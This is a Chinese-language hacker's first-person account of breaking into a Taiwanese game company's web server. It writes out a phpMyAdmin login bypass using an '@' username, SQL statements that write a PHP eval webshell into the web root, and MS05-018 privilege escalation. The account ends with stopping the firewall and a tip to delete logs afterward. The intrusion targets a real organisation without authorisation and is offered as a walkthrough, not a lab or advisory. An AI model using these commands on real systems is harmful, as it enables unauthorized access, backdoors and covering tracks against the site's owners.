ie浏览器中打开的是www.****.com.tw---台湾一家游戏开发公司,我注意了一下
发现8月份最新发布的游戏中,这家公司的游戏占很大比例。呵呵,看起来还不错不知道安全怎么样。
随便点开一个键链,便得到了图1购物网站,它给我一种很熟悉的感觉,是的它应该是
网上下载的PHP程序,以前在弄台湾站时发现有不少站的程序用的都是它,简单的测试了
一下不存在php注入,后台登陆页面为默认/admin/login.php,不过这些没多大的用
处拉,偶没有它的管理员帐号密码。
什么,叫我去问管理员要?
呵呵是个不错的方法,不过更好的是直接拿AK47冲他们公司去(-_-开个玩笑)。
再看看是否安装了phpmyadmin,直接输入http://ip/phpmyadmin/得到一个登陆页面
(如图2),还是需要密码啊。不过没有密码也没关系拉,这里我要介绍AppServ,这是
是一套全功能的全免费WWW服务器架设程序,它整合了Apache、PHP、MySQL…等等于一体,
简单很方便使用,目前台湾很多网站都采用它来架设服务器。它本身是没什么问题拉,
不过如果管理员设置不当,就会引发安全问题----可以随意登陆phpmyadmin,也就是说
phpmyadmin登陆所需的帐号密码对咱没有一点限制拉。只要在登陆窗口的用户名一栏中输
入任意带"@"的用户名密码随便,均能成功登陆phpmyadmin,有一点需注意的是,由于设置
不同,权限也就不同,不过大部分都是root权限拉。
好了回到我们的入侵来,输入用户名:“@”密码为空,确定后成功登陆(如图3),看看
权限,没错为root权限。再SHOW PROCESSLIST(图4),SELECT * FROM `user`(图5)有啥问题咱一眼就看出来拉。
也许你会问为什么我会知道它用的是AppServ,其实很简单拉,只要随便试一下就知道了,
再就是自己架设一个玩玩,图6是它的默认首页,不过它一般都会被管理员删掉,另外还可以
根据phpinfo.php来判断,phpinfo.php一般在根目录下,有时也在phpmyadmin目录下,找到
PHP Variables中的_SERVER["PATH_TRANSLATED"]项(如图7),看到没,其中蓝色部分就是
phpinfo.php的绝对路径,其中的AppServ很显眼吧,嘿嘿,不小心记下这个路径,等一下咱还
有用呢。
不管它们了,现在的首要任务是上传马儿,PHPMYADMIN上传马的方法不外乎
select * from cmd into outfile,好了,在phpmyadmin中输入SQL命令(如图8):
create table cmd(str TEXT);
insert into cmd values("<?php eval($_POST[cmd])?>");
select * from cmd into outfile "d:\\appserv\\www\\phpmyadmin\\cmd.php";
drop table cmd;
相信大家都看得懂吧,不懂也不要问我,其中”<?php eval($_POST[cmd])?>“是LANKER微型PHP后门服务端代码,d:\\appserv\\www\\phpmyadmin\\这个是PHPMYADMIN的绝对路径,前面不小心记下的。
确定后成功返回结果(图9),然后用lanker微型PHP后门客户端连接上传PHP木马,再提权,本以
为入侵会很顺利,却没想到......
上传PHP木马返回(如图10),很不幸出错了,我想可能是不能上传PHP文件吧,我在上传其它
文件并没有出错,本想直接写个PHP文件进去,可惜手上除了ANGEL的PHPSPY没有其它马了,而lanker
微型PHP后门客户端创建文件不支持中文字符,PHPSPY中的中文太多,懒得改了,再试着其他方法上传
马,发现服务器设置得还不错,内外都很坚固,TFTP,FTP根本没反应,ping www.163.com返回
“Request timed out”,果然禁止了对外连接,可能是防火墙的缘故吧,net start查看开放服务(如图11),
服务器上运行的Sygate Personal Firewall,这是一款用于个人计算机的双向防入侵系统,它能够从
能够从系统内部进行保护,就这点比其他的防火墙强多拉。
目前本地提权的漏洞新出了不少,而且许多管理员都不怎么勤快,所以提权并不难,这里我使用的是
MS05018漏洞进行提权,exploit早就出来拉,直接在PHP后门客户端中上传运行MS05018.exe PID,这样我
们的PHP木马就是ADMIN权限拉,然后在net stop "Sygate Personal Firewall" 关闭防火墙,本想开3389
没想到一查看确是Windows 2000 Professional,真该死竟然不用 SERVER或其它的版本做服务器,害我只能
用RADMIN 或VNC控制了,算拉入侵到这里也就要结束拉,对了不要忘了DEL日志哦~~~~~~~